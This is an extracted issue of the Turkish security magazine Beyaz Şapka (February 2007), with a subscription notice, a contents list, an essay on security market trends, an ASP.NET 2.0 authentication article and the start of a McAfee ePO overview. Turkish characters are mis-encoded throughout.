ABONE SiSTEMiMiZ DE ifiiyor

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "ABONE SiSTEMiMiZ DE ifiiyor"

Transkript

1 B L G G Ü V E N L G P L A T F O R M U syf: 3 ABONE SiSTEMiMiZ DE ifiiyor LÜTFEN KAYIT OLUN B LG S STEMLER VE R SK YÖNET M MICROSOFT GÜVENL K STRATEJ S MCAFEE S STEM GÜVEN K YÖNET M DATA LOSS PREVENTION CAPTCHA VISTA GÜVENL UNDERGROUND

2 LAN fiubat 2007 mtiyaz Sahibi Sinan Y lmaz Sorumlu Müdür Erkan fien Yay n Dan flman Mehmet Ersin Da l Yay n Kurulu Caner Da l, Erkan fien, Serkan Akcan, Sinan Y lmaz Editor Attila Bilir Grafik Tasar m Erden Gümüflçü dari fller Koordinatörü Serkan Akcan Bu Say ya Katk da Bulunanlar Arma an Zalo lu, Bora Dal, Cankat Domaniç, Coflkun Kamilo lu, Erkan fien, Esra Mutlu, Göksel Topbafl, Hakan Ünsal, Mehmet Üner, Mehmet Emre, Murat Lostar, Murat Özdemir, Serkan Akcan, Serkan Ak n, Sinan Y lmaz, Tunç Çokkeser, Tunç Günergün, Umut Ayd n Yönetim Yeri Mecidiyeköy fl Merkezi fiehit Ahmet Sokak No:4 Kat:12 D:121 Mecidiyeköy / stanbul Bask Promat Bas m Yay n San ve Tic A.fi. Tel: (212) Adile Naflit Bulvar 122. Sokak No: Esenyurt STANBUL Yay n Türü Yayg n Süreli, 3 Ayda bir yay nlan r ÜCRETS ZD R, PARA LE SATILMAZ. Ana Sponsorlar Kat l mc Sponsorlar nebula De erli okurumuz, Abone sistemimiz de ifliyor, lütfen kay t olun... Öncelikle Beyaz fiapka projemize gösterdi iniz yo un ilgi için teflekkür ederiz. Türkiye de bilgi güvenli ine katk da bulunmak hepimize sonsuz bir mutluluk veriyor. Beyaz fiapka, destekleriniz sayesinde içeri ini gelifltirerek büyümeye devam edecek. Düflündü ümüzden çok daha h zl büyüyen Beyaz fiapka n n abonelik sistemini yönetmekte baz zorluklar yaflamaya bafllad k. Her say da ortalama 50 kadar abonemiz ifl ya da adres de ifltiriyor. Yine her say da ortalama 200 kadar yeni abone baflvurusu al yoruz. Ayr ca abonelerimizden Beyaz fiapka y etkileflimli bir altyap yla bilgi güvenli i uzmanlar n bir araya getirmemiz gerekti ini belirten onlarca elektronik posta ald k. Dolay s ile abonelik sistemimizde de ifliklik yap yoruz. Dergi da t m listesinin yönetimini kolaylaflt rmak için her Beyaz fiapka abonesinin internet sitemizden yeniden kay t olmas n bekliyoruz. Kay t s ras nda her abonemize bir kullan c ad ve flifre verece iz. May s 2007 say s ndan itibaren, web sitemizde kay t yaratmam fl kiflilere maalesef dergi gönderimi yapamayaca- z. Beyaz fiapka abonelerimiz bu sistem sayesinde ifl ve adres de iflikliklerini web sitemizden kendileri yapabilecekler. Dolay s ile sizlerden web sitemizden yeni abone kayd yaratman z rica ediyoruz. Hepimizin tek amac sistemlerimizin ya da müflterilerimizin güvenli ini sa lamak Ancak tüm bunlar n ötesinde hepimizin sosyal sorumluklar oldu una inan yoruz. Ülkemizin ihtiyaç duydu u konularda sosyal yard mlaflmay desteklemeyi bir görev biliyoruz. Bu sebeple dergimizin her say s nda sosyal sorumluluk projelerine yer verece iz. Her zaman söyledi imiz gibi lütfen fikirlerinizi bizimle paylafl n. Çünkü Beyaz fiapka hepimizin... Beyaz fiapka Yönetimi içindekiler 04 >> Bilgi Güvenli inde Vizyon Türkiye de bilgi güvenli i pazar n n gelece i 06 >> Web Projelerinde Kimlik Do rulama ve Rol Tabanl Yetkilendirme Web uygulamalar nda h zl ve güvenilir hesap yönetimi 10 >> McAfee Sistem Güvenlik Yönetimi McAfee nin merkezi güvenlik yönetim, politika yürütme ve raporlama arac, epo 28 >> A ve Uygulama H zland rma Wide Area Network yap s nda mevcut iletiflimi ve uygulamalar h zland rmak 30 >> Forefront Security for Exchange Server Microsoft Exchange alt yap lar na etkin ve yüksek performansl güvenlik çözümü 32 >> Data Loss Prevention DLP nedir? Ne de ildir? Web Sitesi Tasar m ve Programlamas Da t m Aktif Da t m letiflim Hizmetleri Pazarlama San ve Tic A.fi. Beyaz fiapka ücretsiz olarak abonelerine da t l r marka ba ms zd r sayfalar okuyucular na aç kt r bilgiye yöneliktir bilgi güvenli ine önem veren sponsorlar n n katk s ile okuyucular na ulafl r üç ayda bir yay nlan r Nebula Biliflim Sistemleri San ve Tic Ltd fiti taraf ndan ücretsiz da t l r. 14 >> Biliflim Sistemeleri ve Risk Yönetimi Biliflim sistemlerinde risk de erlendirmesi 16 >> Windows Vista Güvenlik Özellikleri Vista n n 4 ana bafll kta toplanm fl geliflmifl güvenlik teknolojileri 20 >> Underground MSF ile atak simülasyonu 22 >> Microsoft Güvenlik Stratejisi Microsoft un güvenlik teknolojilerine bak fl 24 >> Sizde Sanctum var m? Etkin bir veritaban güvenli i sistemi modeli 34 >> CAPTCHA Basit tasarlanm fl web güvenli i 35 >> Güvenlik Portal na Davet Türkçe bilgi güvenli i portal guvenlik.info 36 >> Microsoft Certificate Lifecycle Manager Microsoft un yeni sertifika yönetim arac 38 >> Bilgi Güvenli inde Kapsam Seçimi BGYS kurman n ilk ad m 39 >> KISA...KISA...KISA Sektörden haberler flubat 2007 beyazflapka 03

3 Serkan AKCAN Bilgi Güvenli inde Vizyon fiüphesiz vizyon sahibi kifliler ve kurumlar n baflar ya ulaflma ihtimalleri di erlerine göre daha yüksektir. Ancak vizyon tan m farkl mecralarda farkl anlamlar tafl yabiliyor. Örne in üniversitelerin iflletme derslerinin ço unda vizyonun bireysel bir görüfl bütünü oldu u, flirketlerin ya da organizasyonlar n vizyonu olamayaca söylenir. Oysa ifl dan flmanlar Kurumsal Vizyon gelifltirme hizmetleri vermektedir. Kurumsal dan flmanlar vizyonu genelde ikiye ay r r: flimdiki vizyon ve gelecek vizyonu. Ben en iyisi vizyon sahibi kavram üzerinde duray m, kavram n da Türk Dil Kurumu sözlü ünde nas l geçti- ini yazay m. Vizyon Sahibi: Genifl görüfllü, ileri görüfllü, ufku genifl kimse. Vizyon ile bilgi güvenli i aras ndaki ba lant y 3 temel ad mda ortaya koyabiliriz. Üretici Vizyonu Üreticiler bilgi güvenli inde gelecek zamanlarda ortaya ç kacak tehditleri düflünür ve ürünlerini bu yönde gelifltirir. Ancak bu sayede müflterilerine katma de erli hizmetler üretebilirler. Pazar araflt rmalar ile yat r m karar desteklenir ve ürünler piyasaya sürülür. fl Orta Vizyonu Biz hem üreticilerin hem de müflterilerimizin ifl orta y z. Bizim gibi biliflim sektörünün hizmet taraf nda bulunan flirketlerin belki de tek hedefi müflteri memnuniyetidir (en az ndan bence öyle olmal d r). Ancak müflteri memnuniyeti bir sonuçtur, müflteriyi gelecek teknolojilere haz rlamak ve bu konuda donan ml olmak ön flartt r. Son Kullan c Vizyonu Türkiye de en zay f halka olarak gördü üm konu, son kullan c vizyonu. Ticaret flekli ve yasal düzenlemeler (ihale kanunlar, sat n alma prosedürleri vs.), ço u zaman flirketlerin teknoloji al mlar ndaki vizyonunu arka plana itiyor. 10 y l aflk n biliflim sektörü tecrübemde mevcut kurallar sebebi ile son kullan c lardaki teknik uzmanlar n istemedikleri ürün, teknoloji veya hizmetleri sat n almak zorunda kald n defalarca gördüm. Benim sorumlulu um elbette daha çok ifl ortaklar n n vizyonu çerçevesinde. Bugünkü vizyonumuz için Network IPS, Host IPS, SSLVPN, Security Management, 2 Factor Authentication, Vulnerability Assessment ve Risk Management gibi oldukça yüklü bir teknoloji yat r m yapt k ve bu ürünlerin tamam n kullan yoruz. Tek amac m z teknik ekibimizin bilgi ve tecrübesini maksimum seviyede tutmak. Gelecek vizyonumuz ise yar n talep edilecek ürün ve hizmetleri tespit etmek, gerekli yat r mlar yapmak ve yar nlara flimdiden haz r olmak üzerine kurulu. Bu yaz da Bilgi Güvenli i konusunda gelecek vizyonuna nas l bakt m anlatmaya çal flay m dedim ama biraz uzun bir önsöz oldu. Gelecek zamanlarda karfl m za ç kacak olan tehditleri ve bu tehditlerle nas l mücadele edece imizi düflünmek, bu alanlara yat r m yaparak müflterilerimize do ru çözümler sunmak zorunday m. Hepimiz bu konuda düflünmeliyiz, çünkü flirketimizin yar nlar n ancak bu sayede güvende tutabiliriz y l n n bu ilk günlerinde bizce güvenlik teknolojilerinin nas l bir gelece e sahip oldu unu ve Türkiye pazar n n mevcut teknolojilere adaptasyon sürecini bir beyin f rt nas yaparak ortaya koymaya çal flal m. Beyaz fiapka n n önceki say lar nda da yer ald gibi, ataklar a ve uygulama seviyesine do ru kayd. Yani güvenli imizin bu taraf na biraz daha öncelik vermeliyiz. A seviyesinde Network IPS projeleri h zla yürümeye devam ediyor ama uygulama güvenli i taraf nda büyük bir geliflme yok y l nda uygulama güvenli i taraf nda güvenli kod gelifltirme, Application Firewall ve uygulama güvenlik taramas hizmetlerinde önemli art fllar bekliyorum. Network IPS ürünleri biraz daha küçük sistemlerde projelendirilecek diye umarken Application Firewall teknolojilerinin büyük flirketlere h zla girece ini san yorum. Sektörün üretici taraf nda ise önemli güvenlik üreticilerinin Application Firewall ürünleri gelifltirmesi ya da var olan baflka flirketleri sat n almas beni flafl rtmayacak. Hatta birkaç sene sonra Network IPS teknolojisi ile Application Firewall teknolojisinin ya da Network Firewall ile Application Firewall ürünlerinin ayn donan mlar üzerinde birlikte çal flt n görürsek flafl rmayal m. Klasik Network Firewall ürünleri güvenlik sa lamakta çok yeterli de ildir. Y llard r bunu söyleyip dururken, Unified Threat Management (UTM) ürünleri h zla yay l p beni hakl ç kard. UTM cihazlar tek kutu üzerinde Firewall, IPS, Antivirus ve Antispam gibi teknolojileri çal flt rabiliyor. Ancak her zaman söyledi im gibi, UTM cihazlar n n her bir özelli i k s tland r lm flt r. Dolay s ile UTM cihazlar daha ziyada küçük sistemlere yay lacak, büyük sistemlerde her bir güvenlik teknolojisi ayr ürünler olarak çal flacak. Secure Content Management (SCM) ad na henüz Türkiye al flamad. Hala birço umuz bu ürünlere gateway antivirus gözüyle bak yoruz. Ancak bilgi güvenli i sektöründe SCM art k bir ürün grubu haline geldi. Hatta global araflt rma flirketleri SCM ürün grubu için pazar araflt rmalar yapar oldu. SCM a m zda önemli bir güvenlik noktas oluflturuyor. Elektronik posta sunucular m z n yükünü %70 oran nda azalt yor. HTTP, FTP ve POP3 gibi protokollerden do an ataklar engelleyebiliyor. Önümüzdeki aylarda SCM ürünlerine basit atak engelleme imzalar eklenebilir. Hatta önümüzdeki y llarda SCM ürünleri büyük sistemler için spesifik protokollerde çal flmak üzere tasarlanabilir. Örne in sadece SMTP için çok daha geliflmifl SCM, sadece HTTP için çok daha geliflmifl SCM gibi... Spam postalar hepimizin ortak derdi. Ba ms z Antispam ürünleri de var, SCM ürünlerine entegre ürünler de. Spam mücadelesinde Karantina Yönetimi a rl k kazanacak. Her ne kadar spam tan mlama baflar s günden güne artsa da, bu ifle internet otoritelerinin kesin bir çözüm getirmesi gerekti ini ve getirece- ini düflünüyorum. Microsoft, Sender Policy Framework (SFP) ile bu konuda bir ad m att ancak biliflim sektörü bunu çok hazmetmifl gibi görünmüyor. Ben daha ziyade dijital imza temelli bir kesin çözüm ortaya konaca na inan yorum. Ancak bu çok yak n bir gelecekte olmayacakt r. Google dan bilgi güvenli i harcamalar ile ilgili bir araflt rma yapt m. Özellikle kuzey Amerika da kimlik do rulama teknolojilerinin sat fl rakamlar flafl rt c derecede yüksek. Nedeni ise çok basit: güvenlik ihlallerinin çok büyük bölümü zay f flifre politikas, zay f kimlik denetimi nedeniyle ortaya ç k yor. Sadece kimlik do rulama olarak baksak bile ürünler çok ucuz yaz lmaz. Kullan c bafl na $ gibi maliyetler söz konusu olabiliyor. Ancak sisteme eriflim bilgilerimiz bu rakamdan daha düflük bir öneme sahip de il ki? Single Sign-On (SSO) çözümlerini düflünürsek maliyet daha da artabilir. Yine de Türkiye de pek de erini bulamam fl olan kimlik do rulama çözümlerinin 2007 y l içerisinde önemli derecede artaca n düflünüyorum. ADSL hizmetinin yay lmas ile internet kullan c s say s önemli derecede artt. Eskiden sadece bir web sunucusu ile yürütülen hizmetler art k dört-befl sunucu ile yap l yor. Metro Ethernet altyap s bant geniflliklerini önemli derecede artt rmaya bafllad. Load Balancing ve SSL Acceleration taraf nda yap lan projeler zaten 2006 y l nda artmaya bafllad y l nda Application Acceleration çözümlerinin de h zla artarak yay laca n düflünüyorum. Dünyan n en büyük kurumsal dan flmanl k flirketlerinden birinin çal flan, dünyan n en büyük biliflim üreticilerinden birinin çal - flanlar na ait önemli bilgiler tafl yan CD yi çald rd. Türkiye de bu h rs zl n önemi çok anlafl lamayabilir. Fakat Amerikan kanunlar na göre bu bilgilerin çal nmas, sat lmas ve kullan lmas çok büyük bir suç. Benzer durumlar Türk flirketlerinde de oluyor. Bugüne kadar proje dokümanlar n çald rm fl, önemli dokümanlar n bir köstebek taraf ndan s zd r ld n düflünen, dizüstü bilgisayar n çald rm fl ve içerisinde önemli bilgiler oldu unu söyleyen yüzlerce müflteri gördüm. Bu gibi s k nt lara bilgi güvenli- i üreticileri çözüm getirmifl durumda y l ndan itibaren hayat m za yeni bir güvenlik teknolojisi girecek, Data Loss Prevention (DLP). DLP ürünleri bilgisayarlarda bulunan gizli ve kritik bilgilerin d fl ortamlara tafl nmas n engelliyor. DLP ile korunan bilgileri CD ye ya da USB belleklere kopyalamak, e-posta eki olarak baflkalar na göndermek, an nda mesajlaflma yaz l mlar ile baflka sistemlere transfer etmek, yazd r lmas n ya da fakslanmas n engellemek mümkün. NAC teknolojisi sürekli kafamda soru iflareti uyand r yor. Managed ve unmanaged sistemlerde NAC teknolojisini yürütmek çok zor. Ben en bafl ndan beri NAC teknolojisinin çok yay lamayaca- n düflündüm. Microsoft bu ifle elini att nda iflin çehresi bir miktar de iflecek gibi. Longhorn ile gelecek olan Microsoft NAP sektörde bir standart haline gelebilir. Yine de NAC ürünlerinin, harcanan iflletim eme ine karfl l k gelebilecek bir fayda yaratt - n düflünmüyorum ve her müflteride söyledi im laf m bu sayfada sizlerle paylaflmak istiyorum: Prevention First! Türkiye de ne kadar pazara sahip olaca n kestiremedi im bir tek ürün grubu var, o da Policy Management (Policy Auditing ve Compliance Analysis gibi isimleri de bu kategoriye dahil ediyorum). Güvenlik ve kural denetimi yapan bu ürünler genifl bir tabanda denetim ve raporlama yapabiliyor. Ancak nedendir bilinmez, Türkiye pazar bu tarz ürünlere pek s cak bakm yor. Özellikle Amerikan flirketleri pek gönüllü olmasalar da bu ürünleri kullanmak zorunda kal yor. Nitekim HIPAA, SOX, PCI gibi onlarca uyulmas gereken ve s k denetimi yap lan standart var ve bu ürünler standartlar n tamam na uyum sa layan denetimler yapabiliyor, raporlar üretebiliyor. Türkiye de özellikle Finans gibi sektörel denetim sistemi geliflmifl pazarlarda bu gibi yaz l mlar kullan lacakt r diye düflünüyorum. Ne kadar çok üründen ve teknolojiden bahsettik de il mi? Kim yönetecek bunca ürünü, kim raporlayacak? Güvenlik sistemleri gelifltikçe ve kullan lan ürün say s artt kça mecburen Enterprise Security Management (ESM) ürünlerine yönelece iz, baflka çaremiz yok. ESM ürünleri farkl ifller yapan birçok biliflim ve güvenlik sisteminden bilgi toplay p yorumluyor ve bize anlaml raporlar üretebiliyor. ESM sayesinde tek merkezden risk haritam - z görüp acil önlemler üretebiliyoruz. Bu yaz ma s d ramad m Automated Remedition, Risk Management, Mobile Device Security, Encryption gibi konular da var. Ancak temelde anlatmaya çal flt m fley flu ki; her birimiz çal flt m z kurumun güvenli ini sa lamakla yükümlüyüz. Sorumluluklar paylaflt r labilir ancak devredilemez. Yar n n risklerini bugünden düflünmek, sistemimizin ve flirketimizin gelece ini garanti alt na alacakt r. Bu sayede kolay kazan lamayan para, daha mant kl yat r mlara kayd r labilir ve yat r m geri dönüfl h z artt r labilir. Biliflim güvenli ini sa laman n rahatl bir köflede dursun, güvenilir sistemlerimiz sayesinde müflterilerimizin memnuniyetini artt rabilir, çetin rekabet koflullar nda rakiplerimizden bir ad m ileride olabiliriz. Yar nlar n z güvenli olsun. 04 beyazflapka flubat 2007 flubat 2007 beyazflapka 05

4 Mehmet EMRE ASP.NET 2.0 Web Projelerinde Kimlik Do rulama ve Rol Tabanl Yetkilendirme Gelifltirdi imiz web projelerinin birço unda ortak ifllevsellik olarak, kimlik do rulaman n oldu unu görürüz. Kimlik do rulama, site ziyaretçilerine özellefltirilmifl servisler sunmam z ve site içinde sundu umuz bu ifllevselli i yetkilendirmemizi mümkün k lar. Birçok web sitesinde anonim kullan c lar ve kay tl kullan c lar n web sitesi içinde kullanabilecekleri ifllevsellik farkl d r. Anonim kullan - c lara k s tl bir ifllevsellik seti sunulurken, kay tl kullan c lara çok daha zengin seçenekler sunulmaktad r. Web sitemize basit anlamda bir kimlik do rulama ve yetkilendirme ifllevselli i eklemek için her projemizde baz ad mlar izleriz: Kullan c kimlik bilgilerinin tutuldu u bir veritaban tablosunun oluflturulmas Kullan c kimlik bilgilerinin (Kullan c kodu, flifre vb) al nd - ve kullan c tablosundaki bilgiler do rultusunda do ruland bir kimlik do rulama sayfas Kay tl kullan c lar için sunulan site üzerinde kullan c dolafl rken, ilgili kullan c n n kimlik bilgilerinin o oturum için do rulanm fl oldu unu kay t alt na alan bir sistemin oluflturulmas Kay tl kullan c lar taraf ndan ziyaret edilebilecek sayfalar n sisteme girilmesi ve yetkilendirmenin yap lmas ste e ba l olarak anonim kullan c lar n siteye kay t olabilmeleri için yeni kullan c oluflturma ifllevselli inin sa lanmas Site yöneticilerinin kay tl kullan c lar ile ilgili yönetimsel ifllemleri yapabildikleri bir yap n n kurulmas Yukar da bahsetti imiz maddeler bir web sitesi için kimlik do rulama ve yetkilendirme mekanizmas n n oluflturulmas nda yap lmas gereken temel ifllemleri özetlemektedir. Farkl projelerde, ifl gereksinimleri do rultusunda bu ifllemler detaylanabilir. ASP.NET öncesinde yaz l mc lar, yukar daki mekanizmalar n tamam n kendileri oluflturmak durumundayd lar. ASP.NET form tabanl kimlik tan ma (Forms-based authentication) sistemi ve FormsAuthentication s n f sayesinde kimlik do rulama ve siteye girifl-ç k fl ifllemleri oldukça kolaylaflt. ASP.NET ile gelen form tabanl kimlik tan ma, hayat m z oldukça kolaylaflt rmas na ra men kullan c tablosunun oluflturulmas, kimlik do rulama sayfas n n kodlanmas (Login Page) gibi ifller hala yaz l mc n n yapmas gereken ifller olarak kald. ASP.NET 2.0 ile gelen üyelik sistemi (Membership System) ve bununla ilintili çal flan web kontrolleri yukar da ad m ad m s ralad m z tüm ifllemleri çok kolay bir flekilde yapmam z için ihtiyaç duydu umuz alt yap y bizlere sunmakta. Form Tabanl Kimlik Do rulama lk Ad m ASP.NET öncesi web yaz l mc lar kimlik do rulama ve yetkilendirmeyle ilgili tasar m kararlar n kendileri almak ve bunlar uygulamak durumundayd lar. Örnek vermek gerekirse, sistemde tan ml bir kullan c kodu ve flifresiyle sisteme girifl yapan ve kimlik bilgileri do rulanan bir kullan c n n sitede dolafl rken kimlik do rulamadan geçti i bilgisinin, di er bir ifadeyle kay tl kullan c oturum bilgisinin, sistemde bir flekilde tutulmas gerekmekteydi. Yap lmas gereken ifllerden biri de siteye girifl yap ld ktan sonra ilgili kullan c n n yetkilerinin tutulmas, bu yetkiler do rultusunda web sitesinin ilgili ifllevselli ini kullanabilmesini sa lamak için gerekli kod, yaz l mc lar taraf ndan tasarlanmak ve yaz lmak durumdayd. Bu, ASP.NET öncesinde tan mlanan bir oturum de iflkeni (Session Variable) tutularak ve her sayfa bafl nda bu oturum de iflkeni yard m yla kullan c n n kimlik do rulamadan geçip geçmemesi kontrol edilerek yap l rd. Yine her sayfa giriflinde yaz lan kodlar ile kullan c n n bu sayfay görüntülemeye yetkili olup olmad belirlenirdi. ASP.NET 1.0 ve 1.1 ile gelen form tabanl kimlik do rulama (Forms-based authentication) kullan c hesaplar n n kolay bir flekilde uygulanmas n ve yetkilendirme bilgisinin, web uygulamas n n konfigürasyon dosyas içinde (web.config) tutulmas n mümkün k ld. Form tabanl kimlik do rulamada oluflturulan do rulama bileti (Authentication Ticket), kullan c n n internet taray c s üzerinde çerez içinde tutularak siteyi ziyaret eden kiflinin farkl sayfalar aras nda dolafl rken kimlik bilgilerinin tafl nmas n mümkün k lar. FormsAuthentication s n f da sundu u metodlarla do rulama bileti al nmas n ve bunun site ç k fl nda yok edilmesini sa lar. ASP.NET 1.0 ve 1.1 ile gelen form tabanl kimlik do rulama, web sitelerinin bu ihtiyaçlar n karfl lamak için standart bir yaklafl m getirmekle beraber bu konuda yap lmas gereken birçok iflin tasar m ve kodlamas yaz l mc lara b rakm flt r. Örnek vermek gerekirse, kullan c kimlik ve flifre bilgilerinin tutulaca veritaban tablosunun tasar m ve oluflturulmas, veritaban tablosundaki bilgilerin güvenli bir flekilde saklanmas vb. gibi. ASP.NET 2.0 Üyelik Sistemi ASP.NET 2.0 ile gelen üyelik sistemiyle daha önce ASP.NET 1.0 ve 1.1 de ortaya konulan form tabanl kimlik do rulama sisteminin üzerine yeni eklentiler getirilmifltir. ASP.NET 2.0 ile birlikte kullan c oluflturma, silme ve güncelleme ifllemlerinin programatik olarak yap lmas ve bu ifllemlerin haz r olarak gelen web kontrolleriyle desteklenmesi sa lanm flt r. Böyle bak ld nda ASP.NET 2.0 ile gelen yenilikler yeni üyelik uygulama gelifltirme arabirimleri (Membership API) ve güvenlik web kontrolleri olarak özetlenebilir. Üyelik uygulama gelifltirme arabirimleri (Membership API) sa lay c modeli (provider model) üzerine oturtulmufltur. Bu da arabirimlerin tan mlamalar sabit kalmak kayd yla uygulaman n istenildi inde özellefltirilebilece i anlam na gelmektedir. Özellikle bilgilerin fakl veri kaynaklar üzerinde tutulabilmesi aç s ndan bu önemlidir. Membership s n f n n CreateUser(), GetAllUsers(), ValidateUser()vb. birçok metodu bulunmaktad r. Uygulamada kullan lacak Membership s n f web uygulamas n n konfigürasyon dosyas taraf ndan belirlenir. Özellefltirilmifl bir Mem- 06 beyazflapka flubat 2007 flubat 2007 beyazflapka 07

5 ASP.NET 2.0 Web Projelerinde Kimlik Do rulama ve Rol Tabanl Yetkilendirme bership yap s n konfigürasyon dosyas nda yap lacak de iflikliklerle kullanmak mümkündür. ASP.NET 2.0; do rudan kullan c bilgilerini SQL Server veritaban nda ya da Active Directory üzerinde tutman z sa layacak Membership Provider ile gelmektedir. Mevcut projedeki kullan c veriniz fakl bir veri kayna nda ise ya da yeni yapt n z bir projedeki kullan c verilerinizi farkl bir kaynakta tutmak isterseniz size sa lanan alt yap yla ilgili veri kayna na yönelik bir Membership Provider yazman z mümkün. Kullan c Bilgilerinin Üyelik Sistemi ile SQL Server Üzerinde Tutulmas ASP.NET 2.0 ile gelen Membership Provider lardan biri SqlMembershipProvider d r. Bu provider seçildi inde, kullan c bilgileri SQL Server üzerinde tutulur. Öncelikli olarak veritaban flema do rultusunda oluflturulmal d r. Bunun için iki farkl yöntem uygulanabilir. ASP.NET Web Site Administration Tool un kullan m. fiema do rultusunda ASPNET.MDF dosyas oluflturulup uygulaman n App_Data dizinine koyulacakt r. ASP.NET SQL Server Registration Tool (aspnet_regsql.exe) komut sat r kullan larak çal flt r labilir. Böylelikle istenen SQL Server 2000 veya 2005 sunucusu üzerinde kullan c tablosu oluflturulabilir. ASP.NET Web Site Administration Tool; Visual Studio 2005 içinden WebSite ASP.NET Configuration seçilerek kullan - l r. Daha sonra Security Setup Wizard kullan larak güvenlik ayarlar yap labilir. SqlMembershipProvider kullan c bilgilerini iki farkl tablo üzerinde tutar: aspnet_users: Her kay tl kullan c için bir sat r tutulur. UserId sütunu, her kullan c n n sistem içerisinde tekilli ini garanti alt na al r. UserId sütunu GUID olarak saklan r. aspnet_membership: UserId sütunu ile aspnet_users tablosuna ba lan r. Detay üyelik sistemi bilgileri (e-posta, güvenlik sorusu/cevab vb.) bilgileri bu tabloda tutulur. Güvenlik Web Kontrolleri ASP.NET 2.0 ile birçok yeni web kontrolü gelmifltir. Burada hedef, birçok web projesinde tekrarlanarak yaz lan kodlar n web kontolleri içinde yaz l mc ya sunulmas ve yaz l mc verimlili inin artt r lmas d r. ASP.NET 2.0 içinde yeni gelen sunucu web kontrollerinden 7 tanesi güvenlik amaçl d r ve üyelik sistemi içinde kullan c tan mlamalar yapmam z kolaylaflt r r. Bu kontrollere k saca bakacak olursak Login Login kontrolü, standart kullan c ad ve kodu ile siteye girifl yapmay sa layan bir kontroldür. Log In dü mesine bas ld - nda Membership s n f n n VerifyUser (username, password) metodu çal fl r ve kimlik do rulama sa lan r. E er verilen bilgiler do ru ise kullan c ya bir do rulama bileti sa lan r, de ilse hata yine kontrolün kullan c arabirimi üzerinden dönülür. Kullan c bilgilerinin do ru olmad durumlarda özellefltirilmifl aksiyonlar alabilmek için LoginError Event kullan labilir. Özellefltirilmifl kimlik do rulama mekanizmalar oluflturmak için Authenticate Event kullan labilir. lan c n n kay tl bir kullan c ya da anonim bir kullan c olma durumuna göre ilgili flablon üzerindeki içerik kullan c ya yönlendirilir. PasswordRecovery Bu kontrol, kay tl herhangi bir kullan c ya mevcut flifresinin ya da yeniledi i flifresinin gönderilmesini sa lar. LoginSatatus Bu kontrol, sitede anonim bir kullan c o anda aktif ise, login sayfas na bir ba lant içerir. Aktif kullan c kay tl ve kimlik kontrolünden geçmifl bir kullan c ise bu durumda siteden ç - k fl (Logoff) linki gösterilir. LoginName Bu kontrol, hiç kod yazmaks z n aktif kullan c ismini almam z sa lar. Ayn fley User.Identity.Name API kullan larak programatik olarak gerçeklefltirilebilir. ChangePassword Bu kontrol, kullan c lar n flifrelerini de ifltirmelerini sa lar. CreateUserWizard Kullan c kodu ve flifresi ile girilen sitelerde genellikle bir de yeni kullan c oluflturma ekran na ihtiyaç duyar z. CreateUserWizard kontrolü, yeni kullan c oluflturma arayüzünü yazmam z oldukça kolaylaflt r r. Arkaplanda Membership s - n f CreateUser(...) metodu ça r l r ve üyelik sistemi üzerinde kullan c oluflturma gerçeklefltirilir. Sonuç ASP.NET 2.0 içinde gelen üyelik sistemi ve provider modeli, sunulan yeni sunucu web kontrolleriyle oluflturulacak web sitelerinde, kimlik do rulama ve yetkilendirmeyi oldukça kolay bir hale getirmektedir. Provider modelindeki esnek yap ve sunulan API ler sayesinde, özellefltirilmifl kimlik do rulama ve yetkilendirme mekanizmalar oluflturmak oldukça kolayd r. LoginView Ço unlukla sitenizdeki web sayfas nda kullan c n n kay tl bir kullan c ya da anonim bir kullan c olma durumuna göre farkl içerikler sunmak isteyebilirsiniz. Örnek vermek gerekirse anonim bir kullan c ya ana sayfan zda bir login kontrolü gösterirken kay tl bir kullan c için hoflgeldin mesaj vermek isteyebilirsiniz. Bu gibi durumlarda LoginView iflinizi oldukça kolaylaflt racakt r. Loginview; AnonymousTemplate ve LoggedInTemplate olmak üzere iki flablon içerir. Kul- 08 beyazflapka flubat 2007 flubat 2007 beyazflapka 09

6 Coflkun KAM LO LU McAfee Sistem Güvenlik Yönetimi McAfee epo (Event Policy Orchectrator) tüm McAfee sistem güvenlik yaz l mlar n n yönetilebildi i bir platformdur. Yaklafl k istemci ve sunucunun ayn anda yönetilebilmesine olanak tan yan bu güvenlik platformu, sistem güvenlik yaz l mlar n n uzak kurulumunu, güncellenmesini, ayarlanmas n ve raporlama ifllemlerinin tek bir noktadan yap labilmesini sa lar. Windows 2000 ve 2003 sunucular üzerinde çal flabilen güvenlik yönetimi yaz l m üç farkl birimden oluflur. epo agent: Yönetimi yap lacak tüm istemci ve sunuculara kurulmas gereken bu birim, uzak noktan n epo sunucu ile irtibat n sa lar. Push teknolojisi kullan larak uzak birimlere yüklenebilir. aral klarla epo sunucuyla ba lant ya geçer ve yeni oluflturulan görevleri al r/uygular. Push teknolojisinin haricinde agent, login script, ghost imaj ve do rudan yükleme gibi teknolojiler kullan larak da uzak sistemlere yüklenebilir. epo sunucu platformun ana merkezidir ve tüm ifllemler bu platform üzerinden gerçeklefltirilir. Uzak sistemlere bir kez agent yaz l m kurulduktan sonra tüm McAfee sistem güvenlik yaz l mlar bu merkezi noktadan kurulabilir, kald r labilir, güncellemeleri yap labilir veya tüm sistemler için, sistem gruplar için, tek bir sistem için farkl konfigürasyonlar yap - labilir. Yine istenildi inde kolayl kla bu konfigürasyonlar de- ifltirilip uzak sistemlere uygulanabilir. McAfee epo güvenlik yönetimi yaz l m kullan larak yönetimi yap labilecek yaz - l mlar afla da s ralanm flt r. epo sunucu: epo yönetim platformunun ana birimidir ve tüm uzak yüklemeler, yüklenecek güvenlik yaz l mlar n n konfigürasyonu ve güncelleme ifllemleri epo sunucu üzerinde yarat l r. Veritaban : Yap lan tüm konfigürasyonlar ve raporlar MS SQL 2000, 2005 veya MSDE veritaban nda tutulur. epo agent yaz l m yaklafl k 1.5MB boyutunda küçük bir programd r ve yönetimi yap lacak sunucu ve istemcilere Domain kullan c ad ve flifresi kullan larak uzaktan Push teknolojisiyle yüklenebilir. Yükleme tamamland ktan sonra agent, belirli McAfee ViruScan 4.51, 7.0, 7.1, 8.0 ve 8.5. Sunucu ve istemcilerin virüs güvenli inden sorumludur. Buffer Overflow korumas da içeren ürün s f r nc gün güvenli i sa lar ve henüz yamas olmayan veya temin edilemeyen Buffer Overflow aç klar için koruma sa lar. Ürünün son güncel versiyonu olan 8.5 versiyonunda sistem belle inde saklanan Rootkit lere karfl koruma özelli i getirilmifltir. Registry, dosya ve port bazl k s tlamalar yap labilir ve bir virüs salg n s ras nda ek önlemler al narak Virüs veya Worm gibi zararl yaz - l mlar n yay lmalar n engelleyebilir. McAfee Anti-Spyware 8.0, 8.5. Spyware ve Adware gibi istenmeyen yaz l mlar n sistemlerden uzak 